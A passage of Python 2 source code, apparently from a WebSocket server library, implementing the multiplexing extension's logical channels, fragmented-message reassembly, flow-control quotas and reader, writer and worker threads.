"""Getter to mimic mp_conn.local_addr."""
return self._mux_handler.physical_connection.get_local_addr()
local_addr = property(get_local_addr)
def get_remote_addr(self):
"""Getter to mimic mp_conn.remote_addr."""
return self._mux_handler.physical_connection.get_remote_addr()
remote_addr = property(get_remote_addr)
def get_memorized_lines(self):
"""Gets memorized lines. Not supported."""
raise MuxUnexpectedException('_LogicalConnection does not support '
'get_memorized_lines')
def write(self, data):
"""Writes data. mux_handler sends data asynchronously. The caller will
        be suspended until the write is done.
Args:
data: data to be written.
Raises:
MuxUnexpectedException: when called before finishing the previous
write.
"""
try:
self._write_condition.acquire()
if self._waiting_write_completion:
raise MuxUnexpectedException(
                    'Logical connection %d is already waiting for the '
                    'completion of a write' % self._channel_id)
self._waiting_write_completion = True
self._mux_handler.send_data(self._channel_id, data)
self._write_condition.wait()
# TODO(tyoshino): Raise an exception if woke up by on_writer_done.
finally:
self._write_condition.release()
def write_control_data(self, data):
"""Writes data via the control channel. Don't wait finishing write
because this method can be called by mux dispatcher.
Args:
data: data to be written.
"""
self._mux_handler.send_control_data(data)
def on_write_data_done(self):
"""Called when sending data is completed."""
try:
self._write_condition.acquire()
if not self._waiting_write_completion:
raise MuxUnexpectedException(
'Invalid call of on_write_data_done for logical '
'connection %d' % self._channel_id)
self._waiting_write_completion = False
self._write_condition.notify()
finally:
self._write_condition.release()
def on_writer_done(self):
"""Called by the mux handler when the writer thread has finished."""
try:
self._write_condition.acquire()
self._waiting_write_completion = False
self._write_condition.notify()
finally:
self._write_condition.release()
def append_frame_data(self, frame_data):
"""Appends incoming frame data. Called when mux_handler dispatches
frame data to the corresponding application.
Args:
frame_data: incoming frame data.
"""
self._read_condition.acquire()
self._incoming_data += frame_data
self._read_condition.notify()
self._read_condition.release()
def read(self, length):
"""Reads data. Blocks until enough data has arrived via physical
connection.
Args:
length: length of data to be read.
Raises:
LogicalConnectionClosedException: when closing handshake for this
logical channel has been received.
ConnectionTerminatedException: when the physical connection has
closed, or an error is caused on the reader thread.
"""
self._read_condition.acquire()
while (self._read_state == self.STATE_ACTIVE and
len(self._incoming_data) < length):
self._read_condition.wait()
try:
if self._read_state == self.STATE_GRACEFULLY_CLOSED:
raise LogicalConnectionClosedException(
'Logical channel %d has closed.' % self._channel_id)
elif self._read_state == self.STATE_TERMINATED:
raise ConnectionTerminatedException(
                    'Receiving %d bytes failed. Logical channel (%d) closed' %
(length, self._channel_id))
value = self._incoming_data[:length]
self._incoming_data = self._incoming_data[length:]
finally:
self._read_condition.release()
return value
def set_read_state(self, new_state):
"""Sets the state of this connection. Called when an event for this
connection has occurred.
Args:
            new_state: state to be set. new_state must be one of the following:
- STATE_GRACEFULLY_CLOSED: when closing handshake for this
connection has been received.
- STATE_TERMINATED: when the physical connection has closed or
                  a DropChannel for this connection has been received.
"""
self._read_condition.acquire()
self._read_state = new_state
self._read_condition.notify()
self._read_condition.release()
class _InnerMessage(object):
"""Holds the result of _InnerMessageBuilder.build().
"""
def __init__(self, opcode, payload):
self.opcode = opcode
self.payload = payload
class _InnerMessageBuilder(object):
"""A class that holds the context of inner message fragmentation and
builds a message from fragmented inner frame(s).
"""
def __init__(self):
self._control_opcode = None
self._pending_control_fragments = []
self._message_opcode = None
self._pending_message_fragments = []
self._frame_handler = self._handle_first
def _handle_first(self, frame):
if frame.opcode == common.OPCODE_CONTINUATION:
raise InvalidFrameException('Sending invalid continuation opcode')
if common.is_control_opcode(frame.opcode):
return self._process_first_fragmented_control(frame)
else:
return self._process_first_fragmented_message(frame)
def _process_first_fragmented_control(self, frame):
self._control_opcode = frame.opcode
self._pending_control_fragments.append(frame.payload)
if not frame.fin:
self._frame_handler = self._handle_fragmented_control
return None
return self._reassemble_fragmented_control()
def _process_first_fragmented_message(self, frame):
self._message_opcode = frame.opcode
self._pending_message_fragments.append(frame.payload)
if not frame.fin:
self._frame_handler = self._handle_fragmented_message
return None
return self._reassemble_fragmented_message()
def _handle_fragmented_control(self, frame):
if frame.opcode != common.OPCODE_CONTINUATION:
raise InvalidFrameException(
'Sending invalid opcode %d while sending fragmented control '
'message' % frame.opcode)
self._pending_control_fragments.append(frame.payload)
if not frame.fin:
return None
return self._reassemble_fragmented_control()
def _reassemble_fragmented_control(self):
opcode = self._control_opcode
payload = ''.join(self._pending_control_fragments)
self._control_opcode = None
self._pending_control_fragments = []
if self._message_opcode is not None:
self._frame_handler = self._handle_fragmented_message
else:
self._frame_handler = self._handle_first
return _InnerMessage(opcode, payload)
def _handle_fragmented_message(self, frame):
# Sender can interleave a control message while sending fragmented
# messages.
if common.is_control_opcode(frame.opcode):
if self._control_opcode is not None:
raise MuxUnexpectedException(
'Should not reach here(Bug in builder)')
return self._process_first_fragmented_control(frame)
if frame.opcode != common.OPCODE_CONTINUATION:
raise InvalidFrameException(
'Sending invalid opcode %d while sending fragmented message' %
frame.opcode)
self._pending_message_fragments.append(frame.payload)
if not frame.fin:
return None
return self._reassemble_fragmented_message()
def _reassemble_fragmented_message(self):
opcode = self._message_opcode
payload = ''.join(self._pending_message_fragments)
self._message_opcode = None
self._pending_message_fragments = []
self._frame_handler = self._handle_first
return _InnerMessage(opcode, payload)
def build(self, frame):
"""Build an inner message. Returns an _InnerMessage instance when
the given frame is the last fragmented frame. Returns None otherwise.
Args:
frame: an inner frame.
Raises:
            InvalidFrameException: when an invalid opcode is received (e.g.
                a non-continuation data opcode while the fin flag of
                the previous inner frame was not set).
"""
return self._frame_handler(frame)
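    # A hedged sketch of the reassembly flow with hypothetical frames:
    #   builder = _InnerMessageBuilder()
    #   builder.build(Frame(fin=0, opcode=common.OPCODE_TEXT,
    #                       payload='He'))    # returns None, fragment pending
    #   builder.build(Frame(fin=1, opcode=common.OPCODE_CONTINUATION,
    #                       payload='llo'))
    #   # returns _InnerMessage(common.OPCODE_TEXT, 'Hello')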
class _LogicalStream(Stream):
"""Mimics the Stream class. This class interprets multiplexed WebSocket
frames.
"""
def __init__(self, request, stream_options, send_quota, receive_quota):
"""Constructs an instance.
Args:
request: _LogicalRequest instance.
stream_options: StreamOptions instance.
send_quota: Initial send quota.
receive_quota: Initial receive quota.
"""
# Physical stream is responsible for masking.
stream_options.unmask_receive = False
Stream.__init__(self, request, stream_options)
self._send_closed = False
self._send_quota = send_quota
# - Protects _send_closed and _send_quota
# - Signals the thread waiting for send quota replenished
self._send_condition = threading.Condition()
# The opcode of the first frame in messages.
self._message_opcode = common.OPCODE_TEXT
# True when the last message was fragmented.
self._last_message_was_fragmented = False
self._receive_quota = receive_quota
self._write_inner_frame_semaphore = threading.Semaphore()
self._inner_message_builder = _InnerMessageBuilder()
def _create_inner_frame(self, opcode, payload, end=True):
frame = Frame(fin=end, opcode=opcode, payload=payload)
for frame_filter in self._options.outgoing_frame_filters:
frame_filter.filter(frame)
if len(payload) != len(frame.payload):
raise MuxUnexpectedException(
'Mux extension must not be used after extensions which change '
                'frame boundary')
first_byte = ((frame.fin << 7) | (frame.rsv1 << 6) |
(frame.rsv2 << 5) | (frame.rsv3 << 4) | frame.opcode)
return chr(first_byte) + frame.payload
def _write_inner_frame(self, opcode, payload, end=True):
payload_length = len(payload)
write_position = 0
try:
            # An inner frame will be fragmented if there is not enough send
# quota. This semaphore ensures that fragmented inner frames are
# sent in order on the logical channel.
# Note that frames that come from other logical channels or
# multiplexing control blocks can be inserted between fragmented
# inner frames on the physical channel.
self._write_inner_frame_semaphore.acquire()
            # Consume one octet of quota when this is the first frame of a
            # message.
if opcode != common.OPCODE_CONTINUATION:
try:
self._send_condition.acquire()
while (not self._send_closed) and self._send_quota == 0:
self._send_condition.wait()
if self._send_closed:
raise BadOperationException(
'Logical connection %d is closed' %
self._request.channel_id)
self._send_quota -= 1
finally:
self._send_condition.release()
while write_position < payload_length:
try:
self._send_condition.acquire()
while (not self._send_closed) and self._send_quota == 0:
self._logger.debug(
'No quota. Waiting FlowControl message for %d.' %
self._request.channel_id)
self._send_condition.wait()
if self._send_closed:
raise BadOperationException(
'Logical connection %d is closed' %
                            self._request.channel_id)
remaining = payload_length - write_position
write_length = min(self._send_quota, remaining)
inner_frame_end = (
end and
(write_position + write_length == payload_length))
inner_frame = self._create_inner_frame(
opcode,
payload[write_position:write_position+write_length],
inner_frame_end)
self._send_quota -= write_length
self._logger.debug('Consumed quota=%d, remaining=%d' %
(write_length, self._send_quota))
finally:
self._send_condition.release()
# Writing data will block the worker so we need to release
# _send_condition before writing.
self._logger.debug('Sending inner frame: %r' % inner_frame)
self._request.connection.write(inner_frame)
write_position += write_length
opcode = common.OPCODE_CONTINUATION
except ValueError, e:
raise BadOperationException(e)
finally:
self._write_inner_frame_semaphore.release()
def replenish_send_quota(self, send_quota):
"""Replenish send quota."""
try:
self._send_condition.acquire()
if self._send_quota + send_quota > 0x7FFFFFFFFFFFFFFF:
self._send_quota = 0
raise LogicalChannelError(
self._request.channel_id, _DROP_CODE_SEND_QUOTA_OVERFLOW)
self._send_quota += send_quota
self._logger.debug('Replenished send quota for channel id %d: %d' %
(self._request.channel_id, self._send_quota))
finally:
self._send_condition.notify()
self._send_condition.release()
def consume_receive_quota(self, amount):
"""Consumes receive quota. Returns False on failure."""
if self._receive_quota < amount:
self._logger.debug('Violate quota on channel id %d: %d < %d' %
(self._request.channel_id,
self._receive_quota, amount))
return False
self._receive_quota -= amount
return True
def send_message(self, message, end=True, binary=False):
"""Override Stream.send_message."""
if self._request.server_terminated:
raise BadOperationException(
'Requested send_message after sending out a closing handshake')
if binary and isinstance(message, unicode):
raise BadOperationException(
'Message for binary frame must be instance of str')
if binary:
opcode = common.OPCODE_BINARY
else:
opcode = common.OPCODE_TEXT
message = message.encode('utf-8')
for message_filter in self._options.outgoing_message_filters:
message = message_filter.filter(message, end, binary)
if self._last_message_was_fragmented:
if opcode != self._message_opcode:
raise BadOperationException('Message types are different in '
'frames for the same message')
opcode = common.OPCODE_CONTINUATION
else:
self._message_opcode = opcode
self._write_inner_frame(opcode, message, end)
self._last_message_was_fragmented = not end
def _receive_frame(self):
"""Overrides Stream._receive_frame.
        In addition to calling Stream._receive_frame, this method adds the
        amount of payload to the receive quota and sends FlowControl to the
        client.
We need to do it here because Stream.receive_message() handles
control frames internally.
"""
opcode, payload, fin, rsv1, rsv2, rsv3 = Stream._receive_frame(self)
amount = len(payload)
        # Replenish one extra octet when receiving the first frame of a
        # message.
if opcode != common.OPCODE_CONTINUATION:
amount += 1
self._receive_quota += amount
frame_data = _create_flow_control(self._request.channel_id,
amount)
self._logger.debug('Sending flow control for %d, replenished=%d' %
(self._request.channel_id, amount))
self._request.connection.write_control_data(frame_data)
return opcode, payload, fin, rsv1, rsv2, rsv3
def _get_message_from_frame(self, frame):
"""Overrides Stream._get_message_from_frame.
"""
try:
inner_message = self._inner_message_builder.build(frame)
except InvalidFrameException:
raise LogicalChannelError(
self._request.channel_id, _DROP_CODE_BAD_FRAGMENTATION)
if inner_message is None:
return None
self._original_opcode = inner_message.opcode
return inner_message.payload
def receive_message(self):
"""Overrides Stream.receive_message."""
# Just call Stream.receive_message(), but catch
# LogicalConnectionClosedException, which is raised when the logical
# connection has closed gracefully.
try:
return Stream.receive_message(self)
except LogicalConnectionClosedException, e:
self._logger.debug('%s', e)
return None
def _send_closing_handshake(self, code, reason):
"""Overrides Stream._send_closing_handshake."""
body = create_closing_handshake_body(code, reason)
self._logger.debug('Sending closing handshake for %d: (%r, %r)' %
(self._request.channel_id, code, reason))
self._write_inner_frame(common.OPCODE_CLOSE, body, end=True)
self._request.server_terminated = True
def send_ping(self, body=''):
"""Overrides Stream.send_ping"""
self._logger.debug('Sending ping on logical channel %d: %r' %
(self._request.channel_id, body))
self._write_inner_frame(common.OPCODE_PING, body, end=True)
self._ping_queue.append(body)
def _send_pong(self, body):
"""Overrides Stream._send_pong"""
self._logger.debug('Sending pong on logical channel %d: %r' %
(self._request.channel_id, body))
self._write_inner_frame(common.OPCODE_PONG, body, end=True)
def close_connection(self, code=common.STATUS_NORMAL_CLOSURE, reason=''):
"""Overrides Stream.close_connection."""
# TODO(bashi): Implement
self._logger.debug('Closing logical connection %d' %
self._request.channel_id)
self._request.server_terminated = True
def stop_sending(self):
"""Stops accepting new send operation (_write_inner_frame)."""
self._send_condition.acquire()
self._send_closed = True
self._send_condition.notify()
self._send_condition.release()
class _OutgoingData(object):
"""A structure that holds data to be sent via physical connection and
origin of the data.
"""
def __init__(self, channel_id, data):
self.channel_id = channel_id
self.data = data
class _PhysicalConnectionWriter(threading.Thread):
"""A thread that is responsible for writing data to physical connection.
TODO(bashi): Make sure there is no thread-safety problem when the reader
    thread reads data from the same socket at the same time.
"""
def __init__(self, mux_handler):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
"""
threading.Thread.__init__(self)
self._logger = util.get_class_logger(self)
self._mux_handler = mux_handler
self.setDaemon(True)
# When set, make this thread stop accepting new data, flush pending
# data and exit.
self._stop_requested = False
# The close code of the physical connection.
self._close_code = common.STATUS_NORMAL_CLOSURE
# Deque for passing write data. It's protected by _deque_condition
# until _stop_requested is set.
self._deque = collections.deque()
# - Protects _deque, _stop_requested and _close_code
# - Signals threads waiting for them to be available
self._deque_condition = threading.Condition()
def put_outgoing_data(self, data):
"""Puts outgoing data.
Args:
data: _OutgoingData instance.
Raises:
BadOperationException: when the thread has been requested to
terminate.
"""
try:
self._deque_condition.acquire()
if self._stop_requested:
raise BadOperationException('Cannot write data anymore')
self._deque.append(data)
self._deque_condition.notify()
finally:
self._deque_condition.release()
def _write_data(self, outgoing_data):
message = (_encode_channel_id(outgoing_data.channel_id) +
outgoing_data.data)
try:
self._mux_handler.physical_stream.send_message(
message=message, end=True, binary=True)
except Exception, e:
util.prepend_message_to_exception(
'Failed to send message to %r: ' %
(self._mux_handler.physical_connection.remote_addr,), e)
raise
# TODO(bashi): It would be better to block the thread that sends
# control data as well.
if outgoing_data.channel_id != _CONTROL_CHANNEL_ID:
self._mux_handler.notify_write_data_done(outgoing_data.channel_id)
def run(self):
try:
self._deque_condition.acquire()
while not self._stop_requested:
if len(self._deque) == 0:
self._deque_condition.wait()
continue
outgoing_data = self._deque.popleft()
self._deque_condition.release()
self._write_data(outgoing_data)
self._deque_condition.acquire()
# Flush deque.
#
# At this point, self._deque_condition is always acquired.
try:
while len(self._deque) > 0:
outgoing_data = self._deque.popleft()
self._write_data(outgoing_data)
finally:
self._deque_condition.release()
# Close physical connection.
try:
            # Don't wait for the response here. The response will be read
# by the reader thread.
self._mux_handler.physical_stream.close_connection(
self._close_code, wait_response=False)
except Exception, e:
util.prepend_message_to_exception(
                    'Failed to close the physical connection: ', e)
raise
finally:
self._mux_handler.notify_writer_done()
def stop(self, close_code=common.STATUS_NORMAL_CLOSURE):
"""Stops the writer thread."""
self._deque_condition.acquire()
self._stop_requested = True
self._close_code = close_code
self._deque_condition.notify()
self._deque_condition.release()
class _PhysicalConnectionReader(threading.Thread):
"""A thread that is responsible for reading data from physical connection.
"""
def __init__(self, mux_handler):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
"""
threading.Thread.__init__(self)
self._logger = util.get_class_logger(self)
self._mux_handler = mux_handler
self.setDaemon(True)
def run(self):
while True:
try:
physical_stream = self._mux_handler.physical_stream
message = physical_stream.receive_message()
if message is None:
break
                # The code below runs only when a data message is received.
opcode = physical_stream.get_last_received_opcode()
if opcode != common.OPCODE_BINARY:
self._mux_handler.fail_physical_connection(
_DROP_CODE_INVALID_ENCAPSULATING_MESSAGE,
'Received a text message on physical connection')
break
except ConnectionTerminatedException, e:
self._logger.debug('%s', e)
break
try:
self._mux_handler.dispatch_message(message)
except PhysicalConnectionError, e:
self._mux_handler.fail_physical_connection(
e.drop_code, e.message)
break
except LogicalChannelError, e:
self._mux_handler.fail_logical_channel(
e.channel_id, e.drop_code, e.message)
except Exception, e:
self._logger.debug(traceback.format_exc())
break
self._mux_handler.notify_reader_done()
class _Worker(threading.Thread):
"""A thread that is responsible for running the corresponding application
handler.
"""
def __init__(self, mux_handler, request):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
request: _LogicalRequest instance.
"""
threading.Thread.__init__(self)
self._logger = util.get_class_logger(self)
self._mux_handler = mux_handler
self._request = request
self.setDaemon(True)
def run(self):
self._logger.debug('Logical channel worker started. (id=%d)' %
self._request.channel_id)
try:
# Non-critical exceptions will be handled by dispatcher.
self._mux_handler.dispatcher.transfer_data(self._request)
except LogicalChannelError, e:
self._mux_handler.fail_logical_channel(
e.channel_id, e.drop_code, e.message)
finally:
self._mux_handler.notify_worker_done(self._request.channel_id)
class _MuxHandshaker(hybi.Handshaker):
"""Opening handshake processor for multiplexing."""
_DUMMY_WEBSOCKET_KEY = 'dGhlIHNhbXBsZSBub25jZQ=='
def __init__(self, request, dispatcher, send_quota, receive_quota):
"""Constructs an instance.
Args:
request: _LogicalRequest instance.
dispatcher: Dispatcher instance (dispatch.Dispatcher).
send_quota: Initial send quota.
receive_quota: Initial receive quota.
"""
hybi.Handshaker.__init__(self, request, dispatcher)
self._send_quota = send_quota
self._receive_quota = receive_quota
# Append headers which should not be included in handshake field of
# AddChannelRequest.
        # TODO(bashi): Decide whether we should raise an exception when
        # these headers are already included.
request.headers_in[common.UPGRADE_HEADER] = (
common.WEBSOCKET_UPGRADE_TYPE)
request.headers_in[common.SEC_WEBSOCKET_VERSION_HEADER] = (
str(common.VERSION_HYBI_LATEST))
request.headers_in[common.SEC_WEBSOCKET_KEY_HEADER] = (
self._DUMMY_WEBSOCKET_KEY)
def _create_stream(self, stream_options):
"""Override hybi.Handshaker._create_stream."""
self._logger.debug('Creating logical stream for %d' %
self._request.channel_id)
return _LogicalStream(
self._request, stream_options, self._send_quota,
self._receive_quota)
def _create_handshake_response(self, accept):
"""Override hybi._create_handshake_response."""
response = []
response.append('HTTP/1.1 101 Switching Protocols\r\n')
# Upgrade and Sec-WebSocket-Accept should be excluded.
response.append('%s: %s\r\n' % (
common.CONNECTION_HEADER, common.UPGRADE_CONNECTION_TYPE))
if self._request.ws_protocol is not None:
response.append('%s: %s\r\n' % (
common.SEC_WEBSOCKET_PROTOCOL_HEADER,
self._request.ws_protocol))
if (self._request.ws_extensions is not None and
len(self._request.ws_extensions) != 0):
response.append('%s: %s\r\n' % (
common.SEC_WEBSOCKET_EXTENSIONS_HEADER,
common.format_extensions(self._request.ws_extensions)))
response.append('\r\n')
return ''.join(response)
def _send_handshake(self, accept):
"""Override hybi.Handshaker._send_handshake."""
# Don't send handshake response for the default channel
if self._request.channel_id == _DEFAULT_CHANNEL_ID:
return
handshake_response = self._create_handshake_response(accept)
frame_data = _create_add_channel_response(
self._request.channel_id,
handshake_response)
self._logger.debug('Sending handshake response for %d: %r' %
(self._request.channel_id, frame_data))
self._request.connection.write_control_data(frame_data)
class _LogicalChannelData(object):
"""A structure that holds information about logical channel.
"""
def __init__(self, request, worker):
self.request = request
self.worker = worker
self.drop_code = _DROP_CODE_NORMAL_CLOSURE
self.drop_message = ''
class _HandshakeDeltaBase(object):
"""A class that holds information for delta-encoded handshake."""
def __init__(self, headers):
self._headers = headers
def create_headers(self, delta=None):
"""Creates request headers for an AddChannelRequest that has
delta-encoded handshake.
Args:
            delta: headers to be overridden.
"""
headers = copy.copy(self._headers)
if delta:
for key, value in delta.items():
# The spec requires that a header with an empty value is
# removed from the delta base.
if len(value) == 0 and headers.has_key(key):
del headers[key]
else:
headers[key] = value
return headers
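    # Sketch with hypothetical headers (behaviour read off the loop above):
    #   base = _HandshakeDeltaBase({'Host': 'example.com', 'X-Foo': 'bar'})
    #   base.create_headers({'X-Foo': '', 'X-Baz': 'qux'})
    #   # == {'Host': 'example.com', 'X-Baz': 'qux'}; the empty value
    #   # removes 'X-Foo' from the delta base.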
class _MuxHandler(object):
"""Multiplexing handler. When a handler starts, it launches three
    threads: the reader thread, the writer thread, and a worker thread.
The reader thread reads data from the physical stream, i.e., the
ws_stream object of the underlying websocket connection. The reader
thread interprets multiplexed frames and dispatches them to logical
channels. Methods of this class are mostly called by the reader thread.
The writer thread sends multiplexed frames which are created by
logical channels via the physical connection.
The worker thread launched at the starting point handles the
"Implicitly Opened Connection". If multiplexing handler receives
an AddChannelRequest and accepts it, the handler will launch a new worker
thread and dispatch the request to it.
"""
def __init__(self, request, dispatcher):
"""Constructs an instance.
Args:
request: mod_python request of the physical connection.
dispatcher: Dispatcher instance (dispatch.Dispatcher).
"""
self.original_request = request
self.dispatcher = dispatcher
self.physical_connection = request.connection
self.physical_stream = request.ws_stream
self._logger = util.get_class_logger(self)
self._logical_channels = {}
self._logical_channels_condition = threading.Condition()
# Holds client's initial quota
self._channel_slots = collections.deque()
self._handshake_base = None
self._worker_done_notify_received = False
self._reader = None
self._writer = None
def start(self):
"""Starts the handler.
Raises:
            MuxUnexpectedException: when the handler has already started, or
                when the opening handshake of the default channel fails.
"""
if self._reader or self._writer:
raise MuxUnexpectedException('MuxHandler already started')
self._reader = _PhysicalConnectionReader(self)
self._writer = _PhysicalConnectionWriter(self)
self._reader.start()
self._writer.start()
# Create "Implicitly Opened Connection".
logical_connection = _LogicalConnection(self, _DEFAULT_CHANNEL_ID)
headers = copy.copy(self.original_request.headers_in)
# Add extensions for logical channel.
headers[common.SEC_WEBSOCKET_EXTENSIONS_HEADER] = (
common.format_extensions(
self.original_request.mux_processor.extensions()))
self._handshake_base = _HandshakeDeltaBase(headers)
logical_request = _LogicalRequest(
_DEFAULT_CHANNEL_ID,
self.original_request.method,
self.original_request.uri,
self.original_request.protocol,
self._handshake_base.create_headers(),
logical_connection)
# Client's send quota for the implicitly opened connection is zero,
# but we will send FlowControl later so set the initial quota to
# _INITIAL_QUOTA_FOR_CLIENT.
self._channel_slots.append(_INITIAL_QUOTA_FOR_CLIENT)
send_quota = self.original_request.mux_processor.quota()
if not self._do_handshake_for_logical_request(
logical_request, send_quota=send_quota):
raise MuxUnexpectedException(
'Failed handshake on the default channel id')
self._add_logical_channel(logical_request)
# Send FlowControl for the implicitly opened connection.
frame_data = _create_flow_control(_DEFAULT_CHANNEL_ID,
_INITIAL_QUOTA_FOR_CLIENT)
logical_request.connection.write_control_data(frame_data)
def add_channel_slots(self, slots, send_quota):
"""Adds channel slots.
Args:
slots: number of slots to be added.
send_quota: initial send quota for slots.
"""
self._channel_slots.extend([send_quota] * slots)
# Send NewChannelSlot to client.
frame_data = _create_new_channel_slot(slots, send_quota)
self.send_control_data(frame_data)
def wait_until_done(self, timeout=None):
"""Waits until all workers are done. Returns False when timeout has
occurred. Returns True on success.
Args:
timeout: timeout in sec.
"""
self._logical_channels_condition.acquire()
try:
while len(self._logical_channels) > 0:
self._logger.debug('Waiting workers(%d)...' %
len(self._logical_channels))
self._worker_done_notify_received = False
self._logical_channels_condition.wait(timeout)
if not self._worker_done_notify_received:
self._logger.debug('Waiting worker(s) timed out')
return False
finally:
self._logical_channels_condition.release()
# Flush pending outgoing data
self._writer.stop()
self._writer.join()
return True
def notify_write_data_done(self, channel_id):
"""Called by the writer thread when a write operation has done.
Args:
channel_id: objective channel id.
"""
try:
self._logical_channels_condition.acquire()
if channel_id in self._logical_channels:
channel_data = self._logical_channels[channel_id]
channel_data.request.connection.on_write_data_done()
else:
self._logger.debug('Seems that logical channel for %d has gone'
% channel_id)
finally:
self._logical_channels_condition.release()
def send_control_data(self, data):
"""Sends data via the control channel.
Args:
data: data to be sent.
"""
self._writer.put_outgoing_data(_OutgoingData(
channel_id=_CONTROL_CHANNEL_ID, data=data))
def send_data(self, channel_id, data):
"""Sends data via given logical channel. This method is called by
worker threads.
Args:
channel_id: objective channel id.
data: data to be sent.
"""
self._writer.put_outgoing_data(_OutgoingData(
channel_id=channel_id, data=data))
def _send_drop_channel(self, channel_id, code=None, message=''):
frame_data = _create_drop_channel(channel_id, code, message)
self._logger.debug(
'Sending drop channel for channel id %d' % channel_id)
self.send_control_data(frame_data)
def _send_error_add_channel_response(self, channel_id, status=None):
if status is None:
status = common.HTTP_STATUS_BAD_REQUEST
if status in _HTTP_BAD_RESPONSE_MESSAGES:
message = _HTTP_BAD_RESPONSE_MESSAGES[status]
else:
self._logger.debug('Response message for %d is not found' % status)
message = '???'
response = 'HTTP/1.1 %d %s\r\n\r\n' % (status, message)
frame_data = _create_add_channel_response(channel_id,
encoded_handshake=response,
encoding=0, rejected=True)
self.send_control_data(frame_data)
def _create_logical_request(self, block):
if block.channel_id == _CONTROL_CHANNEL_ID:
# TODO(bashi): Raise PhysicalConnectionError with code 2006
# instead of MuxUnexpectedException.
raise MuxUnexpectedException(
'Received the control channel id (0) as objective channel '
'id for AddChannel')
if block.encoding > _HANDSHAKE_ENCODING_DELTA:
raise PhysicalConnectionError(
_DROP_CODE_UNKNOWN_REQUEST_ENCODING)
method, path, version, headers = _parse_request_text(
block.encoded_handshake)
if block.encoding == _HANDSHAKE_ENCODING_DELTA:
headers = self._handshake_base.create_headers(headers)
connection = _LogicalConnection(self, block.channel_id)
request = _LogicalRequest(block.channel_id, method, path, version,
headers, connection)
return request
def _do_handshake_for_logical_request(self, request, send_quota=0):
try:
receive_quota = self._channel_slots.popleft()
except IndexError:
raise LogicalChannelError(
request.channel_id, _DROP_CODE_NEW_CHANNEL_SLOT_VIOLATION)
handshaker = _MuxHandshaker(request, self.dispatcher,
send_quota, receive_quota)
try:
handshaker.do_handshake()
except handshake.VersionException, e:
self._logger.info('%s', e)
self._send_error_add_channel_response(
request.channel_id, status=common.HTTP_STATUS_BAD_REQUEST)
return False
except handshake.HandshakeException, e:
# TODO(bashi): Should we _Fail the Logical Channel_ with 3001
# instead?
self._logger.info('%s', e)
self._send_error_add_channel_response(request.channel_id,
status=e.status)
return False
except handshake.AbortedByUserException, e:
self._logger.info('%s', e)
self._send_error_add_channel_response(request.channel_id)
return False
return True
def _add_logical_channel(self, logical_request):
try:
self._logical_channels_condition.acquire()
if logical_request.channel_id in self._logical_channels:
self._logger.debug('Channel id %d already exists' %
logical_request.channel_id)
raise PhysicalConnectionError(
_DROP_CODE_CHANNEL_ALREADY_EXISTS,
'Channel id %d already exists' %
logical_request.channel_id)
worker = _Worker(self, logical_request)
channel_data = _LogicalChannelData(logical_request, worker)
self._logical_channels[logical_request.channel_id] = channel_data
worker.start()
finally:
self._logical_channels_condition.release()
def _process_add_channel_request(self, block):
try:
logical_request = self._create_logical_request(block)
except ValueError, e:
self._logger.debug('Failed to create logical request: %r' % e)
self._send_error_add_channel_response(
block.channel_id, status=common.HTTP_STATUS_BAD_REQUEST)
return
if self._do_handshake_for_logical_request(logical_request):
if block.encoding == _HANDSHAKE_ENCODING_IDENTITY:
# Update handshake base.
# TODO(bashi): Make sure this is the right place to update
# handshake base.
self._handshake_base = _HandshakeDeltaBase(
logical_request.headers_in)
self._add_logical_channel(logical_request)
else:
self._send_error_add_channel_response(
block.channel_id, status=common.HTTP_STATUS_BAD_REQUEST)
def _process_flow_control(self, block):
try:
self._logical_channels_condition.acquire()
            if block.channel_id not in self._logical_channels:
return
channel_data = self._logical_channels[block.channel_id]
channel_data.request.ws_stream.replenish_send_quota(
block.send_quota)
finally:
self._logical_channels_condition.release()
def _process_drop_channel(self, block):
self._logger.debug(
'DropChannel received for %d: code=%r, reason=%r' %
(block.channel_id, block.drop_code, block.drop_message))
try:
self._logical_channels_condition.acquire()
            if block.channel_id not in self._logical_channels:
return
channel_data = self._logical_channels[block.channel_id]
channel_data.drop_code = _DROP_CODE_ACKNOWLEDGED
# Close the logical channel
channel_data.request.connection.set_read_state(
_LogicalConnection.STATE_TERMINATED)
channel_data.request.ws_stream.stop_sending()
finally:
self._logical_channels_condition.release()
def _process_control_blocks(self, parser):
for control_block in parser.read_control_blocks():
opcode = control_block.opcode
self._logger.debug('control block received, opcode: %d' % opcode)
if opcode == _MUX_OPCODE_ADD_CHANNEL_REQUEST:
self._process_add_channel_request(control_block)
elif opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Received AddChannelResponse')
elif opcode == _MUX_OPCODE_FLOW_CONTROL:
self._process_flow_control(control_block)
elif opcode == _MUX_OPCODE_DROP_CHANNEL:
self._process_drop_channel(control_block)
elif opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Received NewChannelSlot')
else:
raise MuxUnexpectedException(
'Unexpected opcode %r' % opcode)
def _process_logical_frame(self, channel_id, parser):
self._logger.debug('Received a frame. channel id=%d' % channel_id)
try:
self._logical_channels_condition.acquire()
            if channel_id not in self._logical_channels:
# We must ignore the message for an inactive channel.
return
channel_data = self._logical_channels[channel_id]
fin, rsv1, rsv2, rsv3, opcode, payload = parser.read_inner_frame()
consuming_byte = len(payload)
if opcode != common.OPCODE_CONTINUATION:
consuming_byte += 1
if not channel_data.request.ws_stream.consume_receive_quota(
consuming_byte):
# The client violates quota. Close logical channel.
raise LogicalChannelError(
channel_id, _DROP_CODE_SEND_QUOTA_VIOLATION)
header = create_header(opcode, len(payload), fin, rsv1, rsv2, rsv3,
mask=False)
frame_data = header + payload
channel_data.request.connection.append_frame_data(frame_data)
finally:
self._logical_channels_condition.release()
def dispatch_message(self, message):
"""Dispatches message. The reader thread calls this method.
Args:
message: a message that contains encapsulated frame.
Raises:
PhysicalConnectionError: if the message contains physical
connection level errors.
LogicalChannelError: if the message contains logical channel
level errors.
"""
parser = _MuxFramePayloadParser(message)
try:
channel_id = parser.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_CHANNEL_ID_TRUNCATED)
if channel_id == _CONTROL_CHANNEL_ID:
self._process_control_blocks(parser)
else:
self._process_logical_frame(channel_id, parser)
def notify_worker_done(self, channel_id):
